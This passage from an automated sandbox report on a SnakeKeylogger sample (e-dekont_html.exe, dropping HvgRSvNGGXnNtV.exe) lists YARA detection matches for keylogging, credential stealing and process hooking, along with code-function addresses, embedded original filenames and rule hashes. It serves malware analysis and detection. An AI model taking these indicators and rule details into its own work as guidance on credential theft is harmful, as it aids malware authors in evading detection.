                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_00A6EFE40_2_00A6EFE4
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_02756F580_2_02756F58
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_027500780_2_02750078
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_027500880_2_02750088
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_02756F480_2_02756F48
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0864E4480_2_0864E448
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08645AF80_2_08645AF8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08647B680_2_08647B68
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08647B570_2_08647B57
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08645F200_2_08645F20
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08645F300_2_08645F30
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086485080_2_08648508
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086485180_2_08648518
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086477210_2_08647721
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086477300_2_08647730
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086678000_2_08667800
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086668F00_2_086668F0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D1F00_2_0866D1F0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086656D00_2_086656D0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086688490_2_08668849
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086688580_2_08668858
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866F0380_2_0866F038
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086668E30_2_086668E3
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866A0890_2_0866A089
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866A0980_2_0866A098
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D9200_2_0866D920
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D9300_2_0866D930
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D1B40_2_0866D1B4
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669AC80_2_08669AC8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669AB80_2_08669AB8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866EB680_2_0866EB68
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D4780_2_0866D478
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669C280_2_08669C28
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669C380_2_08669C38
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D4880_2_0866D488
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866E4880_2_0866E488
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08665EE00_2_08665EE0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08665EF00_2_08665EF0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086676FF0_2_086676FF
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669EC80_2_08669EC8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D6C80_2_0866D6C8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_0866D6D80_2_0866D6D8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086696A80_2_086696A8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086656B00_2_086656B0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08669EB80_2_08669EB8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086696980_2_08669698
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086667600_2_08666760
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086647E00_2_086647E0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086647F00_2_086647F0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_086677F00_2_086677F0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161C14710_2_0161C147
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161A08810_2_0161A088
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161536210_2_01615362
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161D27810_2_0161D278
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161C46810_2_0161C468
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161C73810_2_0161C738
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_016169A010_2_016169A0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161E98810_2_0161E988
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161CA0810_2_0161CA08
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161CCD810_2_0161CCD8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_01616FC810_2_01616FC8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161CFAC10_2_0161CFAC
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_01613E0910_2_01613E09
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161F63110_2_0161F631
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161E97C10_2_0161E97C
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_016129EC10_2_016129EC
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_01613AA110_2_01613AA1
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_0161FA8810_2_0161FA88
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E51E8010_2_06E51E80
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E517A010_2_06E517A0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E50B3010_2_06E50B30
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5502810_2_06E55028
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5F81010_2_06E5F810
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E59C1810_2_06E59C18
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5296810_2_06E52968
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5954810_2_06E59548
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5EAF810_2_06E5EAF8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5E6AF10_2_06E5E6AF
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5E6B010_2_06E5E6B0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E51E7010_2_06E51E70
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5E24910_2_06E5E249
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5E25810_2_06E5E258
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5DE0010_2_06E5DE00
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E58BA010_2_06E58BA0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5F3A810_2_06E5F3A8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5F3B810_2_06E5F3B8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5178F10_2_06E5178F
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5EF6010_2_06E5EF60
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5EF5110_2_06E5EF51
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E50B2010_2_06E50B20
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5EB0810_2_06E5EB08
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5D0F810_2_06E5D0F8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5CCA010_2_06E5CCA0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5CC8F10_2_06E5CC8F
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5FC6810_2_06E5FC68
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5004010_2_06E50040
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5000610_2_06E50006
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5F80110_2_06E5F801
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5501810_2_06E55018
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5DDFF10_2_06E5DDFF
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5D9A810_2_06E5D9A8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5D99910_2_06E5D999
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5D54010_2_06E5D540
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5D55010_2_06E5D550
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E5295B10_2_06E5295B
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_00DBEFE411_2_00DBEFE4
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_027458C011_2_027458C0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_027458B011_2_027458B0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C4D79011_2_07C4D790
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C4772111_2_07C47721
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C4773011_2_07C47730
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C4850811_2_07C48508
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C4851811_2_07C48518
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C45F2011_2_07C45F20
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C45F3011_2_07C45F30
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C47B5711_2_07C47B57
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C47B6811_2_07C47B68
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_07C45AF811_2_07C45AF8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A780011_2_080A7800
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A68E211_2_080A68E2
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD1F011_2_080AD1F0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A7E4011_2_080A7E40
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A56D011_2_080A56D0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AF03811_2_080AF038
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD92011_2_080AD920
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A993811_2_080A9938
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD93011_2_080AD930
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A994811_2_080A9948
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD1B811_2_080AD1B8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A9AA911_2_080A9AA9
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A9AB811_2_080A9AB8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AEB6811_2_080AEB68
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD47811_2_080AD478
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AE48811_2_080AE488
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD48811_2_080AD488
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A951911_2_080A9519
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A9D4811_2_080A9D48
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A9D4511_2_080A9D45
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD6C811_2_080AD6C8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A86C911_2_080A86C9
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A86D811_2_080A86D8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080AD6D811_2_080AD6D8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A5EE011_2_080A5EE0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A76FF11_2_080A76FF
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A9F0811_2_080A9F08
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A676011_2_080A6760
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A77DC11_2_080A77DC
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 11_2_080A47EA11_2_080A47EA
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFC14616_2_00EFC146
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFD27816_2_00EFD278
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF536216_2_00EF5362
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFC46816_2_00EFC468
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFC73816_2_00EFC738
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF29E016_2_00EF29E0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF69A016_2_00EF69A0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFE98816_2_00EFE988
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFCA0816_2_00EFCA08
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFCCD816_2_00EFCCD8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF9DE016_2_00EF9DE0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF3E0916_2_00EF3E09
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EF6FC816_2_00EF6FC8
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFCFA916_2_00EFCFA9
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFF63116_2_00EFF631
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFE97A16_2_00EFE97A
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 16_2_00EFFA8816_2_00EFFA88
                Source: e-dekont_html.exe, 00000000.00000002.1360492109.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1373982401.000000000AF70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000000.1306298047.0000000000112000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQrSB.exeB vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1366238188.0000000002A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1372684486.0000000006929000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000003FD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 0000000A.00000002.3785665812.0000000000444000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 0000000A.00000002.3786958978.00000000012F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont_html.exe
                Source: e-dekont_html.exeBinary or memory string: OriginalFilenameQrSB.exeB vs e-dekont_html.exe
                Source: e-dekont_html.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
